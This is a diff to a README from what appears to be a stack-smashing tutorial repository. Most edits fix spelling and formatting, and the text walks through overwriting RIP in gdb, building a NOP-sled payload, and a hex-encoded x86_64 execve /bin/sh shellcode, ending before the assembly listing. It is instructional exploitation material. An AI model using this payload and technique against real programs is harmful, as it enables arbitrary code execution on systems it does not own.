daedalus/stack_smashing/README.md

 0x00007f0041414141 in ?? ()
 ```

-Now lets check the registers
+Now lets check the registers:

 ```
 (gdb) info reg
+rsp            0x7fffffffdfe0	0x7fffffffdfe0
 rip            0x7f0041414141   0x7f0041414141
 ```
-This means that now we control what the rip register point to.
+This means that now we control what the _RIP_ register or (return instruction pointer) point to.
-This is our powerfull weapon beacuse this is the vulnerability itself,
-becuse if we can control rip we can point it to our malicious code.
+This is our powerfull weapon becuse if we can control the _RIP_ register we can point it to our malicious code.

+The register _RSP_ point to the top of the current stack frame.
+We will need to remember this value for later.

-Lets Introduce the nop-sled:
+_Lets Introduce the nop-sled:_

-The NOOP instruction tells the CPU to do nothing and move to the next instruction.
+The _NOP_ instruction tells the CPU to do nothing and move to the next instruction.
-The nop sled is like: pincture Boba Fet falling into the Sarlacc pit.
+The _NOP-sled_ is like: picture Boba Fet falling into the Sarlacc pit.
-Anywhere we land into the middle of a nop-sled we end up in the same place.
+Anywhere we land into the middle of a _NOP-sled_ we end up in the same place.
-And in the end of the nop-sled we are going to put our shellcode.
+And in the end of the _NOP-sled_ we are going to put our shellcode.
-Then our main idea is to put a big enought nop-sled that takes almost all the buffer up to almost the address where rip is.
+Then our main idea is to put a big enought _NOP-sled_ that takes almost all the buffer up to almost the address where _RIP_ is.

-Again we run our inocent program with a bunch of nops
+Again we run our innocent program with a bunch of _NOPs_:
 ```
 (gdb) run $(python -c 'print "\x90" * 524 ')
 Program received signal SIGSEGV, Segmentation fault.
 0x00007f0090909090 in ?? ()
 ```
-The same happens but the rip address not points to **0x00007f0090909090**
+The same happens but the rip address now points to **0x00007f0090909090**.

-We need to add to the end of the nop-sled our shellcode **"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"**
+We need to add to the end of the _NOP-sled_ our _shellcode:_ **"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"**

-This is a generic linux-x86_64 execve /bin/sh shellcode
+This is a generic _linux-x86_64 execve /bin/sh shellcode:_

 Its asm code is:
 ```